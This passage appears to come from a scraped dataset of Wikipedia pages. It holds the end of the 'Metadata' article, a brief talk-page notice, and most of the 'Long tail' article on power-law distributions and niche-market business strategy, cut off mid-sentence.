metadata include the establishment of digital libraries including e-print repositories and digital image libraries. While often based on library principles, the focus on non-librarian use, especially in providing metadata, means they do not follow traditional or common cataloging approaches. Given the custom nature of included materials, metadata fields are often specially created e.g. taxonomic classification fields, location fields, keywords, or copyright statement. Standard file information such as file size and format are usually automatically included. 55 Library operation has for decades been a key topic in efforts toward international standardization. Standards for metadata in digital libraries include Dublin Core, METS, MODS, DDI, DOI, URN, PREMIS schema, EML, and OAI-PMH. Leading libraries in the world give hints on their metadata standards strategies. 56 57 The use and creation of metadata in library and information science also include scientific publications: Metadata for scientific publications is often created by journal publishers and citation databases such as PubMed and Web of Science. The data contained within manuscripts or accompanying them as supplementary material is less often subject to metadata creation, 58 59 though they may be submitted to e.g. biomedical databases after publication. The original authors and database curators then become responsible for metadata creation, with the assistance of automated processes. Comprehensive metadata for all experimental data is the foundation of the FAIR Guiding Principles, or the standards for ensuring research data are findable, accessible, interoperable, and reusable. 60 Such metadata can then be utilized, complemented, and made accessible in useful ways. OpenAlex is a free online index of over 200 million scientific documents that integrates and provides metadata such as sources, citations, author information, scientific fields, and research topics. Its API and open source website can be used for metascience, scientometrics, and novel tools that query this semantic web of papers. 61 62 63 Another project under development, Scholia, uses the metadata of scientific publications for various visualizations and aggregation features such as providing a simple user interface summarizing literature about a specific feature of the SARS-CoV 2 virus using Wikidata's "main subject" property. 64 In research labor, transparent metadata about authors' contributions to works have been proposed e.g. the role played in the production of the paper, the level of contribution and the responsibilities. 65 66 Moreover, various metadata about scientific outputs can be created or complemented for instance, scite.ai attempts to track and link citations of papers as 'Supporting', 'Mentioning' or 'Contrasting' the study. 67 Other examples include developments of alternative metrics 68 which, beyond providing help for assessment and findability, also aggregate many of the public discussions about a scientific paper on social media such as Reddit, citations on Wikipedia, and reports about the study in the news media 69 and a call for showing whether or not the original findings are confirmed or could get reproduced. 70 71 Metadata in a museum context is the information that trained cultural documentation specialists, such as archivists, librarians, museum registrars and curators, create to index, structure, describe, identify, or otherwise specify works of art, architecture, cultural objects and their images. 72 73 74 Descriptive metadata is most commonly used in museum contexts for object identification and resource recovery purposes. 73 Metadata is developed and applied within collecting institutions and museums in order to: Many museums and cultural heritage centers recognize that given the diversity of artworks and cultural objects, no single model or standard suffices to describe and catalog cultural works. 72 73 74 For example, a sculpted Indigenous artifact could be classified as an artwork, an archaeological artifact, or an Indigenous heritage item. The early stages of standardization in archiving, description and cataloging within the museum community began in the late 1990s with the development of standards such as Categories for the Description of Works of Art (CDWA), Spectrum, CIDOC Conceptual Reference Model (CRM), Cataloging Cultural Objects (CCO) and the CDWA Lite XML schema. 73 These standards use HTML and XML markup languages for machine processing, publication and implementation. 73 The Anglo-American Cataloguing Rules (AACR), originally developed for characterizing books, have also been applied to cultural objects, works of art and architecture. 74 Standards, such as the CCO, are integrated within a Museum's Collections Management System (CMS), a database through which museums are able to manage their collections, acquisitions, loans and conservation. 74 Scholars and professionals in the field note that the "quickly evolving landscape of standards and technologies" creates challenges for cultural documentarians, specifically non-technically trained professionals. 75 page needed Most collecting institutions and museums use a relational database to categorize cultural works and their images. 74 Relational databases and metadata work to document and describe the complex relationships amongst cultural objects and multi-faceted works of art, as well as between objects and places, people, and artistic movements. 73 74 Relational database structures are also beneficial within collecting institutions and museums because they allow for archivists to make a clear distinction between cultural objects and their images; an unclear distinction could lead to confusing and inaccurate searches. 74 An object's materiality, function, and purpose, as well as the size (e.g., measurements, such as height, width, weight), storage requirements (e.g., climate-controlled environment), and focus of the museum and collection, influence the descriptive depth of the data attributed to the object by cultural documentarians. 74 The established institutional cataloging practices, goals, and expertise of cultural documentarians and database structure also influence the information ascribed to cultural objects and the ways in which cultural objects are categorized. 72 74 Additionally, museums often employ standardized commercial collection management software that prescribes and limits the ways in which archivists can describe artworks and cultural objects. 75 As well, collecting institutions and museums use Controlled Vocabularies to describe cultural objects and artworks in their collections. 73 74 Getty Vocabularies and the Library of Congress Controlled Vocabularies are reputable within the museum community and are recommended by CCO standards. 74 Museums are encouraged to use controlled vocabularies that are contextual and relevant to their collections and enhance the functionality of their digital information systems. 73 74 Controlled Vocabularies are beneficial within databases because they provide a high level of consistency, improving resource retrieval. 73 74 Metadata structures, including controlled vocabularies, reflect the ontologies of the systems from which they were created. Often the processes through which cultural objects are described and categorized through metadata in museums do not reflect the perspectives of the maker communities. 72 76 Metadata has been instrumental in the creation of digital information systems and archives within museums and has made it easier for museums to publish digital content online. This has enabled audiences who might not have had access to cultural objects due to geographic or economic barriers to have access to them. 73 In the 2000s, as more museums have adopted archival standards and created intricate databases, discussions about Linked Data between museum databases have come up in the museum, archival, and library science communities. 75 Collection Management Systems (CMS) and Digital Asset Management tools can be local or shared systems. 74 Digital Humanities scholars note many benefits of interoperability between museum databases and collections, while also acknowledging the difficulties of achieving such interoperability. 75 Problems involving metadata in litigation in the United States are becoming widespread. when? Courts have looked at various questions involving metadata, including the discoverability of metadata by parties. The Federal Rules of Civil Procedure have specific rules for discovery of electronically stored information, and subsequent case law applying those rules has elucidated on the litigant's duty to produce metadata when litigating in federal court. 77 In October 2009, the Arizona Supreme Court has ruled that metadata records are public record. 78 Document metadata have proven particularly important in legal environments in which litigation has requested metadata, that can include sensitive information detrimental to a certain party in court. Using metadata removal tools to "clean" or redact documents can mitigate the risks of unwittingly sending sensitive data. This process partially (see data remanence) protects law firms from potentially damaging leaking of sensitive data through electronic discovery. Opinion polls have shown that 45% of Americans are "not at all confident" in the ability of social media sites to ensure their personal data is secure and 40% say that social media sites should not be able to store any information on individuals. 76% of Americans say that they are not confident that the information advertising agencies collect on them is secure and 50% say that online advertising agencies should not be allowed to record any of their information at all. 79 In Australia, the need to strengthen national security has resulted in the introduction of a new metadata storage law. 80 This new law means that both security and policing agencies will be allowed to access up to 2 years of an individual's metadata, with the aim of making it easier to stop any terrorist attacks and serious crimes from happening. Legislative metadata has been the subject of some discussion in law.gov forums such as workshops held by the Legal Information Institute at the Cornell Law School on 22 and 23 March 2010. The documentation for these forums is titled, "Suggested metadata practices for legislation and regulations". 81 A handful of key points have been outlined by these discussions, section headings of which are listed as follows: Australian medical research pioneered the definition of metadata for applications in health care. That approach offers the first recognized attempt to adhere to international standards in medical sciences instead of defining a proprietary standard under the World Health Organization (WHO) umbrella. The medical community yet did not approve of the need to follow metadata standards despite research that supported these standards. 82 Research studies in the fields of biomedicine and molecular biology frequently yield large quantities of data, including results of genome or meta-genome sequencing, proteomics data, and even notes or plans created during the course of research itself. 83 Each data type involves its own variety of metadata and the processes necessary to produce these metadata. General metadata standards, such as ISA-Tab, 84 allow researchers to create and exchange experimental metadata in consistent formats. Specific experimental approaches frequently have their own metadata standards and systems: metadata standards for mass spectrometry include mzML 85 and SPLASH, 86 while XML-based standards such as PDBML 87 and SRA XML 88 serve as standards for macromolecular structure and sequencing data, respectively. The products of biomedical research are generally realized as peer-reviewed manuscripts and these publications are yet another source of data (see Science). A data warehouse (DW) is a repository of an organization's electronically stored data. Data warehouses are designed to manage and store the data. Data warehouses differ from business intelligence (BI) systems because BI systems are designed to use data to create reports and analyze the information, to provide strategic guidance to management. 89 Metadata is an important tool in how data is stored in data warehouses. The purpose of a data warehouse is to house standardized, structured, consistent, integrated, correct, "cleaned" and timely data, extracted from various operational systems in an organization. The extracted data are integrated in the data warehouse environment to provide an enterprise-wide perspective. Data are structured in a way to serve the reporting and analytic requirements. The design of structural metadata commonality using a data modeling method such as entity-relationship model diagramming is important in any data warehouse development effort. They detail metadata on each piece of data in the data warehouse. An essential component of a data warehouse business intelligence system is the metadata and tools to manage and retrieve the metadata. Ralph Kimball 90 describes metadata as the DNA of the data warehouse as metadata defines the elements of the data warehouse and how they work together. Kimball et al. 91 refers to 3 main categories of metadata: Technical metadata, business metadata and process metadata. Technical metadata is primarily definitional, while business metadata and process metadata is primarily descriptive. The categories sometimes overlap. The HTML format used to define web pages allows for the inclusion of a variety of types of metadata, from basic descriptive text, dates and keywords to further advanced metadata schemes such as the Dublin Core, e-GMS, and AGLS 92 standards. Pages and files can also be geotagged with coordinates, categorized or tagged, including collaboratively such as with folksonomies. When media has identifiers set or when such can be generated, information such as file tags and descriptions can be pulled or scraped from the Internet for example about movies. 93 Various online databases are aggregated and provide metadata for various data. The collaboratively built Wikidata has identifiers not just for media but also abstract concepts, various objects, and other entities, that can be looked up by humans and machines to retrieve useful information and to link knowledge in other knowledge bases and databases. 64 Metadata may be included in the page's header or in a separate file. Microformats allow metadata to be added to on-page data in a way that regular web users do not see, but computers, web crawlers and search engines can readily access. Many search engines are cautious about using metadata in their ranking algorithms because of exploitation of metadata and the practice of search engine optimization, SEO, to improve rankings. See the Meta element article for further discussion. This cautious attitude may be justified as people, according to Doctorow, 94 are not executing care and diligence when creating their own metadata and that metadata is part of a competitive environment where the metadata is used to promote the metadata creators own purposes. Studies show that search engines respond to web pages with metadata implementations, 95 and Google has an announcement on its site showing the meta tags that its search engine understands. 96 Enterprise search startup Swiftype recognizes metadata as a relevance signal that webmasters can implement for their website-specific search engine, even releasing their own extension, known as Meta Tags 2. 97 In the broadcast industry, metadata is linked to audio and video broadcast media to: This metadata can be linked to the video media thanks to the video servers. Most major broadcast sporting events like FIFA World Cup or the Olympic Games use this metadata to distribute their video content to TV stations through keywords. It is often the host broadcaster 98 who is in charge of organizing metadata through its International Broadcast Centre and its video servers. This metadata is recorded with the images and entered by metadata operators (loggers) who associate in live metadata available in metadata grids through software (such as Multicam(LSM) or IPDirector used during the FIFA World Cup or Olympic Games). 99 100 Metadata that describes geographic objects in electronic storage or format (such as datasets, maps, features, or documents with a geospatial component) has a history dating back to at least 1994. This class of metadata is described more fully on the geospatial metadata article. Ecological and environmental metadata is intended to document the "who, what, when, where, why, and how" of data collection for a particular study. This typically means which organization or institution collected the data, what type of data, which date(s) the data was collected, the rationale for the data collection, and the methodology used for the data collection. Metadata should be generated in a format commonly used by the most relevant science community, such as Darwin Core, Ecological Metadata Language, 101 or Dublin Core. Metadata editing tools exist to facilitate metadata generation (e.g. Metavist, 102 Mercury, Morpho 103 ). Metadata should describe the provenance of the data (where they originated, as well as any transformations the data underwent) and how to give credit for (cite) the data products. When first released in 1982, Compact Discs only contained a Table Of Contents (TOC) with the number of tracks on the disc and their length in samples. 104 105 Fourteen years later in 1996, a revision of the CD Red Book standard added CD-Text to carry additional metadata. 106 But CD-Text was not widely adopted. Shortly thereafter, it became common for personal computers to retrieve metadata from external sources (e.g. CDDB, Gracenote) based on the TOC. Digital audio formats such as digital audio files superseded music formats such as cassette tapes and CDs in the 2000s. Digital audio files could be labeled with more information than could be contained in just the file name. That descriptive information is called the audio tag or audio metadata in general. Computer programs specializing in adding or modifying this information are called tag editors. Metadata can be used to name, describe, catalog, and indicate ownership or copyright for a digital audio file, and its presence makes it much easier to locate a specific audio file within a group, typically through use of a search engine that accesses the metadata. As different digital audio formats were developed, attempts were made to standardize a specific location within the digital files where this information could be stored. As a result, almost all digital audio formats, including mp3, broadcast wav, and AIFF files, have similar standardized locations that can be populated with metadata. The metadata for compressed and uncompressed digital music is often encoded in the ID3 tag. Common editors such as TagLib support MP3, Ogg Vorbis, FLAC, MPC, Speex, WavPack TrueAudio, WAV, AIFF, MP4, and ASF file formats. With the availability of cloud applications, which include those to add metadata to content, metadata is increasingly available over the Internet. Metadata can be stored either internally, 107 in the same file or structure as the data (this is also called embedded metadata), or externally, in a separate file or field from the described data. A data repository typically stores the metadata detached from the data but can be designed to support embedded metadata approaches. Each option has advantages and disadvantages: Metadata can be stored in either human-readable or binary form. Storing metadata in a human-readable format such as XML can be useful because users can understand and edit it without specialized tools. 108 However, text-based formats are rarely optimized for storage capacity, communication time, or processing speed. A binary metadata format enables efficiency in all these respects, but requires special software to convert the binary information into human-readable content. Each relational database system has its own mechanisms for storing metadata. Examples of relational-database metadata include: In database terminology, this set of metadata is referred to as the catalog. The SQL standard specifies a uniform means to access the catalog, called the information schema, but not all databases implement it, even if they implement other aspects of the SQL standard. For an example of database-specific metadata access methods, see Oracle metadata. Programmatic access to metadata is possible using APIs such as JDBC, or SchemaCrawler. 109 One of the first satirical examinations of the concept of Metadata as we understand it today is American science fiction author Hal Draper's short story, "MS Fnd in a Lbry" (1961). Here, the knowledge of all Mankind is condensed into an object the size of a desk drawer, however, the magnitude of the metadata (e.g. catalog of catalogs of... , as well as indexes and histories) eventually leads to dire yet humorous consequences for the human race. The story prefigures the modern consequences of allowing metadata to become more important than the real data it is concerned with, and the risks inherent in that eventuality as a cautionary tale. |
570 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:MyTalk | This user is currently blocked. The latest block log entry is provided below for reference: People on Wikipedia can use this talk page to post a public message about edits made from the IP address you are currently using. Many IP addresses change periodically, and are often shared by several people. You may create an account or log in to avoid future confusion with other logged out users. Creating an account also hides your IP address. |
571 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Long_Tail | In statistics and business, a long tail of some distributions of numbers is the portion of the distribution having many occurrences far from the "head" or central part of the distribution. The distribution could involve popularities, random numbers of occurrences of events with various probabilities, etc. 1 The term is often used loosely, with no definition or an arbitrary definition, but precise definitions are possible. In statistics, the term long-tailed distribution has a narrow technical meaning, and is a subtype of heavy-tailed distribution. 2 3 4 Intuitively, a distribution is (right) long-tailed if, for any fixed amount, when a quantity exceeds a high level, it almost certainly exceeds it by at least that amount: large quantities are probably even larger. a Note that there is no sense of the "long tail" of a distribution, but only the property of a distribution being long-tailed. In business, the term long tail is applied to rank-size distributions or rank-frequency distributions (primarily of popularity), which often form power laws and are thus long-tailed distributions in the statistical sense. This is used to describe the retailing strategy of selling many unique items with relatively small quantities sold of each (the "long tail")—usually in addition to selling fewer popular items in large quantities (the "head"). Sometimes an intermediate category is also included, variously called the body, belly, torso, or middle. The specific cutoff of what part of a distribution is the "long tail" is often arbitrary, but in some cases may be specified objectively; see segmentation of rank-size distributions. The long tail concept has found some ground for application, research, and experimentation. It is a term used in online business, mass media, micro-finance (Grameen Bank, for example), user-driven innovation (Eric von Hippel), knowledge management, and social network mechanisms (e.g. crowdsourcing, crowdcasting, peer-to-peer), economic models, marketing (viral marketing), and IT Security threat hunting within a SOC (Information security operations center). Frequency distributions with long tails have been studied by statisticians since at least 1946. 5 The term has also been used in the finance 6 and insurance business 7 for many years. The work of Beno t Mandelbrot in the 1950s and later has led to him being referred to as "the father of long tails". 8 The long tail was popularized by Chris Anderson in an October 2004 Wired magazine article, in which he mentioned Amazon.com, Apple and Yahoo as examples of businesses applying this strategy. 7 9 Anderson elaborated the concept in his book The Long Tail: Why the Future of Business Is Selling Less of More. The distribution and inventory costs of businesses successfully applying a long tail strategy allow them to realize significant profit out of selling small volumes of hard-to-find items to many customers instead of only selling large volumes of a reduced number of popular items. The total sales of this large number of "non-hit items" is called "the long tail". Given enough choice, a large population of customers, and negligible stocking and distribution costs, the selection and buying pattern of the population results in the demand across products having a power law distribution or Pareto distribution. It is important to understand why some distributions are normal vs. long tail (power) distributions. Chris Anderson argues that while quantities such as human height or IQ follow a normal distribution, in scale-free networks with preferential attachments, power law distributions are created, i.e. because some nodes are more connected than others (like Malcolm Gladwell’s “mavens” in The Tipping Point). 10 11 The long tail is the name for a long-known feature of some statistical distributions (such as Zipf, power laws, Pareto distributions and general L vy distributions). In "long-tailed" distributions a high-frequency or high-amplitude population is followed by a low-frequency or low-amplitude population which gradually "tails off" asymptotically. The events at the far end of the tail have a very low probability of occurrence. As a rule of thumb, for such population distributions the majority of occurrences (more than half, and where the Pareto principle applies, 80%) are accounted for by the first 20% of items in the distribution. Power law distributions or functions characterize an important number of behaviors from nature and human endeavor. This fact has given rise to a keen scientific and social interest in such distributions, and the relationships that create them. The observation of such a distribution often points to specific kinds of mechanisms, and can often indicate a deep connection with other, seemingly unrelated systems. Examples of behaviors that exhibit long-tailed distribution are the occurrence of certain words in a given language, the income distribution of a business or the intensity of earthquakes (see: Gutenberg Richter law). Chris Anderson's and Clay Shirky's articles highlight special cases in which we are able to modify the underlying relationships and evaluate the impact on the frequency of events. In those cases the infrequent, low-amplitude (or low-revenue) events the long tail, represented here by the portion of the curve to the right of the 20th percentile can become the largest area under the line. This suggests that a variation of one mechanism (internet access) or relationship (the cost of storage) can significantly shift the frequency of occurrence of certain events in the distribution. The shift has a crucial effect in probability and in the customer demographics of businesses like mass media and online sellers. However, the long tails characterizing distributions such as the Gutenberg Richter law or the words-occurrence Zipf's law, and those highlighted by Anderson and Shirky are of very different, if not opposite, nature: Anderson and Shirky refer to frequency-rank relations, whereas the Gutenberg Richter law and the Zipf's law are probability distributions. Therefore, in these latter cases "tails" correspond to large-intensity events such as large earthquakes and most popular words, which dominate the distributions. By contrast, the long tails in the frequency-rank plots highlighted by Anderson and Shirky would rather correspond to short tails in the associated probability distributions, and therefore illustrate an opposite phenomenon compared to the Gutenberg Richter and the Zipf's laws. Use of the phrase the long tail in business as "the notion of looking at the tail itself as a new market" of consumers was first coined by Chris Anderson. 12 The concept drew in part from a February 2003 essay by Clay Shirky, "Power Laws, Weblogs and Inequality", 13 which noted that a relative handful of weblogs have many links going into them but "the long tail" of millions of weblogs may have only a handful of links going into them. Anderson described the effects of the long tail on current and future business models beginning with a series of speeches in early 2004 and with the publication of a Wired magazine article in October 2004. Anderson later extended it into the book The Long Tail: Why the Future of Business is Selling Less of More (2006). Anderson argues that products in low demand or that have a low sales volume can collectively make up a market share that rivals or exceeds the relatively few current bestsellers and blockbusters, if the store or distribution channel is large enough. Anderson cites earlier research by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith, that showed that a significant portion of Amazon.com's sales come from obscure books that are not available in brick-and-mortar stores. The long tail is a potential market and, as the examples illustrate, the distribution and sales channel opportunities created by the Internet often enable businesses to tap that market successfully. In his Wired article Anderson opens with an anecdote about creating a niche market for books on Amazon. He writes about a book titled Touching the Void about a near-death mountain climbing accident that took place in the Peruvian Andes. Anderson states the book got good reviews, but didn't have much commercial success. However, ten years later a book titled Into Thin Air by Jon Krakauer was published and Touching the Void began to sell again. Anderson realized that this was due to Amazon's recommendations. This created a niche market for those who enjoy books about mountain climbing even though it is not considered a popular genre supporting the long tail theory. An Amazon employee described the long tail as follows: "We sold more books today that didn't sell at all yesterday than we sold today of all the books that did sell yesterday. 14 Anderson has explained the term as a reference to the tail of a demand curve. 15 The term has since been rederived from an XY graph that is created when charting popularity to inventory. In the graph shown above, Amazon's book sales would be represented along the vertical axis, while the book or movie ranks are along the horizontal axis. The total volume of low popularity items exceeds the volume of high popularity items. In his Wired article, Chris Anderson cites earlier research by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith, who first used a log-linear curve on an XY graph to describe the relationship between Amazon.com sales and sales ranking. They found that a large proportion of Amazon.com's book sales come from obscure books that were not available in brick-and-mortar stores. They then quantified the potential value of the long tail to consumers. In an article published in 2003, these authors showed that, while most of the discussion about the value of the Internet to consumers has revolved around lower prices, consumer benefit (a.k.a. consumer surplus) from access to increased product variety in online book stores is ten times larger than their benefit from access to lower prices online. Thus, the primary value of the internet to consumers comes from releasing new sources of value by providing access to products in the long tail. 16 A study by Erik Brynjolfsson, Yu (Jeffrey) Hu, and Michael D. Smith 17 finds that the long tail has grown longer over time, with niche books accounting for a larger share of total sales. Their analyses suggested that by 2008, niche books accounted for 36.7% of Amazon's sales while the consumer surplus generated by niche books has increased at least fivefold from 2000 to 2008. In addition, their new methodology finds that, while the widely used power laws are a good first approximation for the rank-sales relationship, the slope may not be constant for all book ranks, with the slope becoming progressively steeper for more obscure books. In support of their findings, Wenqi Zhou and Wenjing Duan not only find a longer tail but also a fatter tail by an in-depth analysis on consumer software downloading pattern in their paper "Online user reviews, product variety, and the long tail". 18 The demand for all products decreases, but the decrease for the hits is more pronounced, indicating the demand shifting from the hits to the niches over time. In addition, they also observe a superstar effect in the presence of the long tail. A small number of very popular products still dominates the demand. In a 2006 working paper titled "Goodbye Pareto Principle, Hello Long Tail", 19 Erik Brynjolfsson, Yu (Jeffrey) Hu, and Duncan Simester found that, by greatly lowering search costs, information technology in general and Internet markets in particular could substantially increase the collective share of hard-to-find products, thereby creating a longer tail in the distribution of sales. They used a theoretical model to show how a reduction in search costs will affect the concentration in product sales. By analyzing data collected from a multi-channel retailing company, they showed empirical evidence that the Internet channel exhibits a significantly less concentrated sales distribution, when compared with traditional channels. An 80 20 rule fits the distribution of product sales in the catalog channel quite well, but in the Internet channel, this rule needs to be modified to a 72 28 rule in order to fit the distribution of product sales in that channel. The difference in the sales distribution is highly significant, even after controlling for consumer differences. The key supply-side factor that determines whether a sales distribution has a long tail is the cost of inventory storage and distribution. Where inventory storage and distribution costs are insignificant, it becomes economically viable to sell relatively unpopular products; however, when storage and distribution costs are high, only the most popular products can be sold. For example, a traditional movie rental store has limited shelf space, which it pays for in the form of building overhead; to maximize its profits, it must stock only the most popular movies to ensure that no shelf space is wasted. Because online video rental provider (such as Amazon.com or Netflix) stocks movies in centralized warehouses, its storage costs are far lower and its distribution costs are the same for a popular or unpopular movie. It is therefore able to build a viable business stocking a far wider range of movies than a traditional movie rental store. Those economics of storage and distribution then enable the advantageous use of the long tail: for example, Netflix finds that in aggregate, "unpopular" movies are rented more than popular movies. An MIT Sloan Management Review article titled "From Niches to Riches: Anatomy of the Long Tail" 20 examined the long tail from both the supply side and the demand side and identifies several key drivers. On the supply side, the authors point out how e-tailers' expanded, centralized warehousing allows for more offerings, thus making it possible for them to cater to more varied tastes. 21 On the demand side, tools such as search engines, recommendation software, and sampling tools are allowing customers to find products outside their geographic area. The authors also look toward the future to discuss second-order, amplified effects of Long Tail, including the growth of markets serving smaller niches. Not all recommender systems are equal, however, when it comes to expanding the long tail. Some recommenders (i.e. certain collaborative filters) can exhibit a bias toward popular products, creating positive feedback, and actually reduce the long tail. A Wharton study details this phenomenon along with several ideas that may promote the long tail and greater diversity. 22 A 2010 study conducted by Wenqi Zhou and Wenjing Duan 18 further points out that the demand side factor (online user reviews) and the supply side factor (product variety) interplay to influence the long tail formation of user choices. Consumers' reliance on online user reviews to choose products is significantly influenced by the quantity of products available. Specifically, they find that the impacts of both positive and negative user reviews are weakened as product variety goes up. In addition, the increase in product variety reduces the impact of user reviews on popular products more than it does on niche products. The "crowds" of customers, users and small companies that inhabit the long-tail distribution can perform collaborative and assignment work. Some relevant forms of these new production models are: The demand-side factors that lead to the long tail can be amplified by the "networks of products" which are created by hyperlinked recommendations across products. An MIS Quarterly article by Gal Oestreicher-Singer and Arun Sundararajan shows that categories of books on Amazon.com which are more central and thus influenced more by their recommendation network have significantly more pronounced long-tail distributions. Their data across 200 subject areas shows that a doubling of this influence leads to a 50% increase in revenues from the least popular one-fifth of books. 24 The long-tail distribution applies at a given point in time, but over time the relative popularity of the sales of the individual products will change. 25 Although the distribution of sales may appear to be similar over time, the positions of the individual items within it will vary. For example, new items constantly enter most fashion markets. A recent fashion-based model 26 of consumer choice, which is capable of generating power law distributions of sales similar to those observed in practice, 27 takes into account turnover in the relative sales of a given set of items, as well as innovation, in the sense that entirely new items become offered for sale. There may be an optimal inventory size, given the balance between sales and the cost of keeping up with the turnover. An analysis based on this pure fashion model 28 indicates that, even for digital retailers, the optimal inventory may in many cases be less than the millions of items that they can potentially offer. In other words, by proceeding further and further into the long tail, sales may become so small that the marginal cost of tracking them in rank order, even at a digital scale, might be optimised well before a million titles, and certainly before infinite titles. This model can provide further predictions into markets with long-tail distribution, such as the basis for a model for optimizing the number of each individual item ordered, given its current sales rank and the total number of different titles stocked. From a given country's viewpoint, diplomatic interactions with other countries likewise exhibit a long tail. 29 Strategic partners receive the largest amount of diplomatic attention, while a long tail of remote states obtains just an occasional signal of peace. The fact that even allegedly "irrelevant" countries obtain at least rare amicable interactions by virtually all other states was argued to create a societal surplus of peace, a reservoir that can be mobilized in case a state needs it. The long tail thus functionally resembles "weak ties" in interpersonal networks. Before a long tail works, only the most popular products are generally offered. When the cost of inventory storage and distribution fall, a wide range of products become available. This can, in turn, have the effect of reducing demand for the most popular products. For example, a small website that focuses on niches of content can be threatened by a larger website which has a variety of information (such as Yahoo) Web content. The big website covers more variety while the small website has only a few niches to choose from. The competitive threat from these niche sites is reduced by the cost of establishing and maintaining them and the effort required for readers to track multiple small web sites. These factors have been transformed by easy and cheap web site software and the spread of RSS. Similarly, mass-market distributors like Blockbuster may be threatened by distributors like LoveFilm, which supply the titles that Blockbuster doesn't offer because they are not already very popular. Some of the most successful Internet businesses have used the long tail as part of their business strategy. Examples include eBay (auctions), Yahoo and Google (web search), Amazon (retail), and iTunes Store (music and podcasts), amongst the major companies, along with smaller Internet companies like Audible (audio books) and LoveFilm (video rental). These purely digital retailers also have almost no marginal cost, which is benefiting the online services, unlike physical retailers that have fixed limits on their products. The internet can still sell physical goods, but at an unlimited selection and with reviews and recommendations. 30 The internet has opened up larger territories to sell and provide its products without being confined to just the "local Markets" such as physical retailers like Target or even Walmart. With the digital and hybrid retailers there is no longer a perimeter on market demands. 31 The adoption of video games and massively multiplayer online games such as Second Life as tools for education and training is starting to show a long-tailed pattern. It costs significantly less to modify a game than it has been to create unique training applications, such as those for training in business, commercial flight, and military missions. This has led some who? to envision a time in which game-based training devices or simulations will be available for thousands of different job descriptions. citation needed The banking business has used internet technology to reach an increasing number of customers. The most important shift in business model due to the long tail has come from the various forms of microfinance developed. citation needed As opposed to e-tailers, micro-finance is a distinctly low technology business. Its aim is to offer very small credits to lower-middle to lower class and poor people, that would otherwise be ignored by the traditional banking business. The banks that have followed this strategy of selling services to the low-frequency long tail of the sector have found out that it can be an important niche, long ignored by consumer banks. 32 The recipients of small credits tend to be very good payers of loans, despite their non-existent credit history. They are also willing to pay higher interest rates than the standard bank or credit card customer. It also is a business model that fills an important developmental role in an economy. 33 Grameen Bank in Bangladesh has successfully followed this business model. In Mexico the banks Compartamos and Banco Azteca also service this customer demographic, with an emphasis on consumer credit. Kiva.org is an organization that provides micro credits to people worldwide, by using intermediaries called small microfinance organizations (S.M.O.'s)to distribute crowd sourced donations made by Kiva.org lenders. According to the user-driven innovation model, companies can rely on users of their products and services to do a significant part of the innovation work. Users want products that are customized to their needs. They are willing to tell the manufacturer what they really want and how it should work. Companies can make use of a series of tools, such as interactive and internet based technologies, to give their users a voice and to enable them to do innovation work that is useful to the company. Given the diminishing cost of communication and information sharing (by analogy to the low cost of storage and distribution, in the case of e-tailers), long-tailed user driven innovation will gain importance for businesses. In following a long-tailed innovation strategy, the company is using the model to tap into a large group of users that are in the low-intensity area of the distribution. It is their collaboration and aggregated work that results in an innovation effort. Social innovation communities formed by groups of users can perform rapidly the trial and error process of innovation, share information, test and diffuse the results. Eric von Hippel of MIT's Sloan School of Management defined the user-led innovation model in his book Democratizing Innovation. 34 Among his conclusions is the insight that as innovation becomes more user-centered the information needs to flow freely, in a more democratic way, creating a "rich intellectual commons" and "attacking a major structure of the social division of labor". In today's world, customers are eager to voice their opinions and shape the products and services they use. This presents a unique opportunity for companies to leverage interactive and internet-based technologies to give their users a voice and enable them to participate in the innovation process. By doing so, companies can gain valuable insights into their customer's needs and preferences, which can help drive product development and innovation. By creating a platform for their users to share their ideas and feedback, companies can harness the power of collaborative innovation and stay ahead of the competition. Ultimately, involving users in the innovation process is a win-win for both companies and their customers, as it leads to more tailored, effective products and services that better meet the needs of the end user. The drive to build a market and obtain revenue from the consumer demographic of the long tail has led businesses to implement a series of long-tail marketing techniques, most of them based on extensive use of internet technologies. Among the most representative are: The long tail has possible implications for culture and politics. Where the opportunity cost of inventory storage and distribution is high, only the most popular products are sold. But where the long tail works, minority tastes become available and individuals are presented with a wider array of choices. The long tail presents opportunities for various suppliers to introduce products in the niche category. These encourage the diversification of products. These niche products open opportunities for suppliers while concomitantly satisfying the demands of many individuals therefore lengthening the tail portion of the long tail. In situations where popularity is currently determined by the lowest common denominator, a long-tail model may lead to improvement in a society's level of culture. The opportunities that arise because of the long tail greatly affect society's cultures because suppliers have unlimited capabilities due to infinite storage and demands that were unable to be met prior to the long tail are realized. At the end of the long tail, the conventional profit-making business model ceases to exist; instead, people tend to come up with products for varied reasons like expression rather than monetary benefit. In this way, the long tail opens up a large space for authentic works of creativity. Television is a good example of this: Chris Anderson defines long-tail TV in the context of "content that is not available through traditional distribution channels but could nevertheless find an audience. 36 Thus, the advent of services such as television on demand, pay-per-view and even premium cable subscription services such as HBO and Showtime open up the opportunity for niche content to reach the right audiences, in an otherwise mass medium. These may not always attract the highest level of viewership, but their business distribution models make that of less importance. As the opportunity cost goes down, the choice of TV programs grows and greater cultural diversity rises. Often presented as a phenomenon of interest primarily to mass market retailers and web-based businesses, the long tail also has implications for the producers of content, especially those whose products could not for economic reasons find a place in pre-Internet information distribution channels controlled by book publishers, record companies, movie studios, and television networks. Looked at from the producers' side, the long tail has made possible a flowering of creativity across all fields of human endeavour. citation needed One example of this is YouTube, where thousands of diverse videos whose content, production value or lack of popularity make them inappropriate for traditional television are easily accessible to a wide range of viewers. The intersection of viral marketing, online communities and new technologies that operate within the long tail of consumers and business is described in the novel by William Gibson, Pattern Recognition. In military thinking, John Robb applies the long tail to the developments in insurgency and terrorist movements, showing how technology and networking allows the long tail of disgruntled groups and criminals to take on the nation state and have a chance to win. A 2008 study by Anita Elberse, professor of business administration at Harvard Business School, calls the long tail theory into question, citing sales data which shows that the Web magnifies the importance of blockbuster hits. 37 On his blog, Chris Anderson responded to the study, praising Elberse and the academic rigor with which she explores the issue but drawing a distinction between their respective interpretations of where the "head" and "tail" begin. Elberse defined head and tail using percentages, while Anderson uses absolute numbers. 38 Similar results were published by Serguei Netessine and Tom F. Tan, who suggest that head and tail should be defined by percentages rather than absolute numbers. 39 Also in 2008, a sales analysis of an unnamed UK digital music service by economist Will Page and high-tech entrepreneur Andrew Bud found that sales exhibited a log-normal 